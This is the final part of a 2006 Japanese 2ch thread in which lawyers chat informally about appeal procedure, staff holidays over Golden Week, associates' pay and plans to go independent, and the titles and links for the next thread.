946 :無責任な名無しさん:2006/04/28(金) 04:30:44 ID:VP9OSCy7
資力の内、一番大きかったのが自社及び関連会社株の大量保有だった訳で、それが
紙くずになった今、どの程度の資力が残っているのかは、本人でもよく解っていない
ってのが、現況だと思うが。
保釈されたので、やっと金勘定を出来る様になる訳で。
まあ、それが公表されるかどうかは知らんが。

947 :無責任な名無しさん:2006/04/28(金) 08:34:18 ID:C6MNAaKE
>>941
答弁書で,うっかり訴訟費用の負担だけ認諾しちゃう弁護士が多いね。
裁判所が訂正を促してくれるけど。

948 :TN:2006/04/28(金) 10:12:57 ID:YqqVYWKs
皆さんのご指摘を受けて控訴理由書に訂正しておきました
久しぶりに控訴すると細かいことを忘れてしまってる

949 :無責任な名無しさん:2006/04/28(金) 10:51:14 ID:FBopxvDQ
ホリエモン、ずいぶん若くかっこよくなってたね。
飽食はいかんわ。摂生せんと。

950 :無責任な名無しさん:2006/04/28(金) 11:25:20 ID:qtCFfErY
>>941
仮釈放の手続を法律で確認しちゃったよw
仮釈放の上申をしたことある弁護士いるのかね?
とりあえず確定審弁護人の職務ではないよな。
受刑刑務所も受刑者側で何か希望を言える筋合いのものではないから
まぁ上申書出すくらいしかできないよね。
そんな依頼来ても、何の確約もできないけど費用払ってもらっていいですか
としかいいようがないw

951 :942:2006/04/28(金) 13:40:06 ID:PQzocuem
>>944
ところが,その事務員さんも,超ベテランの前任者が突然体調を崩してやめて,何も知らない新人1人というありさまで...。
最初の頃は新人事務員さんと新人弁護士二人で,うーんと悩みながらやってました。
(これがきっかけでロマンスwという展開にはなりませんでした。)

もちろん,ボス弁は,細かいことはもちろん,法律のことはあまり知りません(笑)。


952 :無責任な名無しさん:2006/04/28(金) 17:23:59 ID:YEDeAWt2
>>941
破棄、自判の時は未決日数は全部算入だよ。


953 :無責任な名無しさん:2006/04/28(金) 17:30:04 ID:W2Mgy9+7
法定通算、これ意外に大きい。
http://www.google.co.jp/search?sourceid=navclient&hl=ja&ie=UTF-8&rls=GGLD,GGLD:2005-15,GGLD:ja&q=%E6%B3%95%E5%AE%9A%E9%80%9A%E7%AE%97

954 :無責任な名無しさん:2006/04/28(金) 22:36:28 ID:YV+LwWTw
>>942先生
さらに駄目押しだが、「受書」は「請書」の間違いではなかろうかと・・・

955 :MS754 ◆yGUnQdhyV2 :2006/04/28(金) 22:38:29 ID:fQnibv0b
皆さん、そろそろ、次スレのスレタイの提案をお願いします。

956 :無責任な名無しさん:2006/04/28(金) 23:03:47 ID:nZ6hBLIV
【花見は】弁護士本音talkスレPart21【まだか?】
から
【連休明け】弁護士本音talkスレPart22【留守電聞くのが辛い】
に誰か移行して暮れ。


957 :無責任な名無しさん:2006/04/28(金) 23:09:10 ID:YV+LwWTw
【連休中は】弁護士本音talkスレPart22【居留守】


958 :無責任な名無しさん:2006/04/28(金) 23:13:27 ID:/ZIoLZdm
朝日新聞によると、木村建設のTV会議は、正式な取締役会じゃないらしい。
おいおい、取締役会がTV会議でできることは常識だろうが。
電話会議ででも取締役会が開催できることは、法務省も認めているだろうが!!


959 :無責任な名無しさん:2006/04/28(金) 23:27:54 ID:JoB60uLO
【連休中は】弁護士本音talkスレPart22【海外逃走】

960 :無責任な名無しさん:2006/04/28(金) 23:28:25 ID:nZ6hBLIV
 事務員さんに,「今月の連休はどうしましょうか。1日と2日で
交代に休んでも良いですよ。」と言った。
 よく考えてみると,これは,非常に酷な選択であり,2日に休み
を取った方が断然有利なわけだ。で,「まぁ,1日は債務整理預か
り金と過払い金報酬を返す仕事があるし,2日は,国賠と離婚訴訟
があるのでお二人とも出勤してください」ということにした。労務
管理も結構大変だ。

961 :無責任な名無しさん:2006/04/28(金) 23:36:54 ID:nZ6hBLIV
間違えた。「過払い金から報酬をもらい,債務整理預かり金をお返しする仕事」。人大杉で,客の名前が
覚えられない。「高橋さん? 4人くらい依頼者いるけどなんの事件の高橋さん?」状態。

962 :無責任な名無しさん:2006/04/28(金) 23:42:27 ID:EM4aUZia
うちは中村さん山本さん佐藤さんがたくさんいる。

963 :MS754 ◆yGUnQdhyV2 :2006/04/28(金) 23:48:50 ID:fQnibv0b
テンプレ案

前スレ↓
【花見は】弁護士本音talkスレPart21【まだか?】
http://school5.2ch.net/test/read.cgi/shikaku/1141830790/
注意書き,リンク集などは>>2-10あたりに・・・


964 :MS754 ◆yGUnQdhyV2 :2006/04/28(金) 23:52:32 ID:fQnibv0b
テンプレ案

○こちらは弁護士の方や関係者などの雑談スレになります。
○特定の個人名、事務所名、電話番号、住所などは絶対に書き込まないでください。
○司法試験関係は 「司法試験板」 http://school5.2ch.net/shihou/ がございます。
○法律相談は、最寄りの法律相談センターや弁護士会、各種相談スレまたは下記スレへ。
   やさしい法律相談 Part172
http://school5.2ch.net/test/read.cgi/shikaku/1145971186/
------------------------------------------------------------
○弁護士の本音トークスレです。
 したがって,それ以外の話題,たとえば
 ×弁護士に対する相談
 ×弁護士以外の人の過度のスレ参加
 はなるべくご遠慮ください。
○荒らしは無視の方向でしかるべく。
○なるべくsage進行で。



965 :MS754 ◆yGUnQdhyV2 :2006/04/28(金) 23:54:24 ID:fQnibv0b
過去スレその1
1:【雑談】弁護士本音talkスレ その2【ため息】
http://school.2ch.net/test/read.cgi/shikaku/1059490362/
2:【雑談】弁護士本音talkスレ その3【ため息】
http://school.2ch.net/test/read.cgi/shikaku/1065526506/
3:【希望】弁護士本音talkスレ その4【失望】
http://school2.2ch.net/test/read.cgi/shikaku/1074280112/
4:【希望】弁護士本音talkスレ その5【失望】
http://school4.2ch.net/test/read.cgi/shikaku/1080568884/
5:【夏期】弁護士本音talkスレ その6【休廷】
http://school4.2ch.net/test/read.cgi/shikaku/1087307654/
6:【夏バテ】弁護士本音talkスレpart7【ビール腹】
http://school4.2ch.net/test/read.cgi/shikaku/1091890714/
7:【ようこそ】弁護士本音talkスレPart8【第58期よ】
http://school4.2ch.net/test/read.cgi/shikaku/1096634157/
8:【諸行】弁護士本音talkスレPart9【無常】
http://school4.2ch.net/test/read.cgi/shikaku/1099052870/
9:【忘年会】弁護士本音talkスレpart10【新年会】
http://school4.2ch.net/test/read.cgi/shikaku/1102088211/
10:【確定】弁護士本音talkスレpart11【申告】
http://school4.2ch.net/test/read.cgi/shikaku/1107791882/



966 :MS754 ◆yGUnQdhyV2 :2006/04/28(金) 23:58:56 ID:fQnibv0b
過去スレその2
11:【黄金】弁護士本音talkスレpart12【週間】
http://school4.2ch.net/test/read.cgi/shikaku/1113138219/
12:【相談は】弁護士本音talkスレpart13【他のスレで】
http://school4.2ch.net/test/read.cgi/shikaku/1115537611/
13:【クールビズ】弁護士本音talkスレpart14【してる?】
http://school5.2ch.net/test/read.cgi/shikaku/1118220156/
14:【国選増額】弁護士本音talkスレ15【熱烈希望】
http://school5.2ch.net/test/read.cgi/shikaku/1122387067/
15:【風立ちぬ】弁護士本音talkスレ16【爽やかに】
http://school5.2ch.net/test/read.cgi/shikaku/1125622482/
16:【WELCOME】弁護士本音talkスレPart17【58期】
http://school5.2ch.net/test/read.cgi/shikaku/1128939534/
17:【食欲の秋】弁護士本音talkスレPart18【ダイエット】
http://school5.2ch.net/test/read.cgi/shikaku/1130480126/
18:【メリー】弁護士本音talkスレPart19【クリスマス】
http://school5.2ch.net/test/read.cgi/shikaku/1133217229/
19:【サヨナラ】弁護士本音talkスレPart20【みなし弁済】
http://school5.2ch.net/test/read.cgi/shikaku/1137164618/
20:【花見は】弁護士本音talkスレPart21【まだか?】
http://school5.2ch.net/test/read.cgi/shikaku/1141830790/








967 :MS754 ◆yGUnQdhyV2 :2006/04/29(土) 00:06:39 ID:tAZX6HIv
関連スレ
【ドラマと】事務員本音talkスレ5頁目【大違い】
http://school5.2ch.net/test/read.cgi/shikaku/1145260846/
■裁判官の部屋 その3■
http://school5.2ch.net/test/read.cgi/shikaku/1137575282/
■若手法曹スレッドpart1■
http://school5.2ch.net/test/read.cgi/shikaku/1112780497/


968 :MS754 ◆yGUnQdhyV2 :2006/04/29(土) 00:10:32 ID:tAZX6HIv
サイト集はそのまま。スレタイ、皆さんのご意見をお願いします。

969 :無責任な名無しさん:2006/04/29(土) 00:24:18 ID:o/Z7A0IO
関連スレ
【嵐は】検事になりたいんですがその11【スルー】
http://school5.2ch.net/test/read.cgi/shihou/1142585590/

これで法曹三者がそろった

970 :MS754 ◆yGUnQdhyV2 :2006/04/29(土) 00:32:17 ID:tAZX6HIv
>>969
関連スレ
【ドラマと】事務員本音talkスレ5頁目【大違い】
http://school5.2ch.net/test/read.cgi/shikaku/1145260846/
■裁判官の部屋 その3■
http://school5.2ch.net/test/read.cgi/shikaku/1137575282/
【嵐は】検事になりたいんですがその11【スルー】
http://school5.2ch.net/test/read.cgi/shihou/1142585590/
■若手法曹スレッドpart1■
http://school5.2ch.net/test/read.cgi/shikaku/1112780497/


971 :無責任な名無しさん:2006/04/29(土) 00:35:45 ID:o/Z7A0IO
関連スレ追加

裁判所書記官だけでマターリしようよ
http://society3.2ch.net/test/read.cgi/koumu/1141056988/

だけど検察事務官のがないおー

972 :MS754 ◆yGUnQdhyV2 :2006/04/29(土) 00:50:35 ID:tAZX6HIv
>>971
関連スレ
【ドラマと】事務員本音talkスレ5頁目【大違い】
http://school5.2ch.net/test/read.cgi/shikaku/1145260846/
■裁判官の部屋 その3■
http://school5.2ch.net/test/read.cgi/shikaku/1137575282/
【嵐は】検事になりたいんですがその11【スルー】
http://school5.2ch.net/test/read.cgi/shihou/1142585590/
■若手法曹スレッドpart1■
http://school5.2ch.net/test/read.cgi/shikaku/1112780497/
裁判所書記官だけでマターリしようよ
http://society3.2ch.net/test/read.cgi/koumu/1141056988/







973 :MS754 ◆yGUnQdhyV2 :2006/04/29(土) 00:54:06 ID:tAZX6HIv
スレタイですが、長いとはねられそうなので、

【連休中は】弁護士本音talkスレPart22【居留守】

でいかがでしょうか。そろそろスレ立てたいと思います。





974 :MS754 ◆yGUnQdhyV2 :2006/04/29(土) 01:05:53 ID:tAZX6HIv
ホスト規制でスレ立てが出来ません。どなたかよろしくお願いいたします。

975 :TN:2006/04/29(土) 07:08:52 ID:S/sX/+Yq
立てときました

http://school5.2ch.net/test/read.cgi/shikaku/1146261889/l50

976 :無責任な名無しさん:2006/04/29(土) 07:37:27 ID:/wcyq1J5
>954
請書か受書かは、事務所によってどちらを使うか分かれているらしい。
裁判所でも、どっちで出しても文句言わないし。
こっちだったか事務員スレだったか、どちらかで前にも議論になってた。
実は、場面によって請書を使う場合と受書を使う場合があるのか?と思いながら
面倒なので根拠条文等を見たことはない。

>960
一回休んでいいと言っておいて、やっぱりどちらも出てと言うなんて。
ご褒美を見せてから取り上げるなんて、さぞ恨まれていることでしょうw

977 :TN:2006/04/29(土) 07:56:51 ID:S/sX/+Yq
GW中は電話もあんまりかかってこないし休ませても良いのでは
その方が気分よく働いてくれると思うよ
そうかいっそのこと9連休にして弁護士だけ出るとかね
ちなみにウチはオレのみ暦通り
事務員は1日休み2日出勤

978 :無責任な名無しさん:2006/04/29(土) 08:34:04 ID:Ix02YARF
うちは弁1,事1の事務所ですが,
1,2日は弁(つまり私)のみ出勤。
ちなみに,今も事務所で起案中w

零細事務所の事務員さんは,ただでさえ
有休が取りにくいのだから,外部と接触する仕事が
少ない連休期間はできるだけ休ませた方がよい。

休みを宣言して後で取り消すのは,
朝令暮改,典型的なお山の大将の発想ですな。
1回言ったことは絶対に守ることが大切と
日頃から考えているところです。


979 :TN:2006/04/29(土) 09:26:46 ID:S/sX/+Yq
978さんの意見に全く同感
前の事務員は遠方に実家があったためGWは大型連休をとらせてた
表向きしめて自分だけ出るっていうのが一番良いと思うよ
(表向きしめると稼ぎが低くなって嫌な人は給料をはずむことだね)

ちなみに私は自宅で朝から酒浸りで2ちゃん

980 :無責任な名無しさん:2006/04/29(土) 09:30:59 ID:5IpynO/W
>>979
不健康ですね
僕は二日酔いで2ch

981 :無責任な名無しさん:2006/04/29(土) 11:44:03 ID:/OtEy/kV
今年も、「5月1、2日休んでもいいよ」って持ちかけたのに、「いいえ、出ます」だって。
5年間勤めてくれた前の事務員サンも、有給消化合計3日だけ。「休むのがイヤなんです」って言っていた。

なんで、我が事務所には、こんな堅物の娘サンばかり来るんだろ。
私は怠け者なのに・・・。
朝から来客1人こなして、今、ビールを飲んでます。

982 :TN:2006/04/29(土) 11:46:23 ID:S/sX/+Yq
そういう子には皆勤手当をあげれば喜ぶよ

983 :名も無い事務員さん:2006/04/29(土) 12:07:54 ID:KKC59+2w
>>982
それうちのボスにも言ってあげてくださいorz

984 :TN:2006/04/29(土) 12:43:16 ID:S/sX/+Yq
やはり何らかの形で誠意を形に示すことだね
893だって「誠意みせんかい」ってよくいうでしょう

985 :無責任な名無しさん:2006/04/29(土) 13:22:36 ID:HnVI/1V/
最近事件がいくつか落ちて気分がいいところに、珍しくボスと兄弁から飯を誘われた。
(ボスは最近会務とか何とかで忙しい。兄弁は新婚ホヤホヤなのですぐ帰ることが多かった)
「何食べるかは君の好きに決めていいよ。」と妙にニコニコしている。
とりあえず寿司屋に連れて行ってもらった。

ボス「最近どう?大変?」といやに機嫌を伺っている。
俺「すこしは余裕があります。」
兄弁「本題に入りましょうよ」
ボス「そうだな。実は、●●さん(同期入所の弁護士)が別の県の事務所に移籍することになったんだわ。」
俺「へぇ。そうなんですか。で、いつからですか?」
ボス「・・・2ヶ月後。」
俺「ナンダッテー!!」(頭真っ白)

単純計算で仕事が1.5倍以上に。
GWは2〜3日休もうと思っていたのがだめになりました・・・orz

986 :無責任な名無しさん:2006/04/29(土) 14:26:21 ID:37Ssp/0O
事務所の移転は俺も本気で考えています。
ボスが一番忙しいのなら、まだ納得しますが
イソが一番忙しくてボスは割と楽チン。そして、収入は我々の数倍。納得行きませんわな。

987 :無責任な名無しさん:2006/04/29(土) 15:47:19 ID:WK4iKhPa
>>986
どこ行っても大体そうなんじゃない?
うちもそうだけど。ボスは遊び回ってる。

988 :無責任な名無しさん:2006/04/29(土) 16:25:06 ID:XmmgA+3L
>>986
当たり前。
ボスは、そのためにイソ弁に給料を支払ってるんだから。

989 :無責任な名無しさん:2006/04/29(土) 16:54:20 ID:UWs6sTFl
>>986
それが嫌なら独立するしかないね。
ボスはなんだかんだ言って仕事取ってくるし、収入変動のリスクも負っているわけだが。

990 :無責任な名無しさん:2006/04/29(土) 20:07:29 ID:37Ssp/0O
私も客を取れるのですが、事務所の事件をこなすのが大変なのでかなり断っています。
しかし、本来は、逆で、私目当ての客が多くて事務所の仕事に支障が来たときは、事務所を辞めて自分の客を大事にするべきかなと思っています。
1人で独立は面倒なので、誰か独立済みの人に共同経営でやれないか頼んでみようかな。
固定客は持っているので、そんなに悪い話でもないのではないかと、都合良く予想しているのだが。

991 :無責任な名無しさん:2006/04/29(土) 21:33:52 ID:ewWxttzY
今日は接見、1日は期日、2日は当番〜orz

992 :無責任な名無しさん:2006/04/29(土) 22:01:50 ID:gpwg//3N
>>990
確かにわかる気がする。
うちは事務所の給料は固定給。数年経って昔よりは
かなり仕事もこなせるようになっていると思うのに、
いまだに新入りのイソ弁と同額。
ボスはそんな給料のことなどおかまいなしに
仕事だけはさも当然のように次から次へと振ってきて
自分は好きなように遊び回っている。数倍の収入を取って。
こちらはその仕事量のおかげで個人事件も思うようにやれず。
年々納得がいかなくなってきてます。
この忙しさに見合う給料をくれるのならいいけども。
ちゃんと給料を上げてくれたりそれなりの待遇を
してくれる所はいいが、そうでない限り
ほんとイソ弁は悲しいですね。独立か。
でもそんな案配だから,独立資金もたまんないしね。
移籍かな。
これから人数が増えたらどうなるのだか…。



993 :無責任な名無しさん:2006/04/30(日) 00:45:44 ID:Jdz2CUeB
俺は田舎弁護士なので,貯金が200万円もなかったが,独立できた。
都会は大変だな。

994 :TN:2006/04/30(日) 08:31:30 ID:VVyLt8gH
今独立を考えてる人はなるべく早く独立したほうがいいと思うよ
2,3年もすれば新人弁護士があふれて独立しにくくなるかもしれないからね

995 :無責任な名無しさん:2006/04/30(日) 11:46:57 ID:Io4nYgF9
そうですね。
とはいえやむをえないボスの事情があって、しばらく様子見状態を強いられています。


996 :無責任な名無しさん:2006/04/30(日) 12:38:43 ID:wUrX5jYH
ボスよりも自分の人生だぞ。

997 :TN:2006/04/30(日) 12:44:44 ID:hDNcB9nm
後釜入れる都合もあるだろうから早めに自分の計画を話しておいたほうがいいよ

998 :無責任な名無しさん:2006/04/30(日) 13:18:33 ID:/UawLZls
2

999 :無責任な名無しさん:2006/04/30(日) 13:45:30 ID:/UawLZls
1

1000 :無責任な名無しさん:2006/04/30(日) 13:46:06 ID:/UawLZls
0

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

275 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)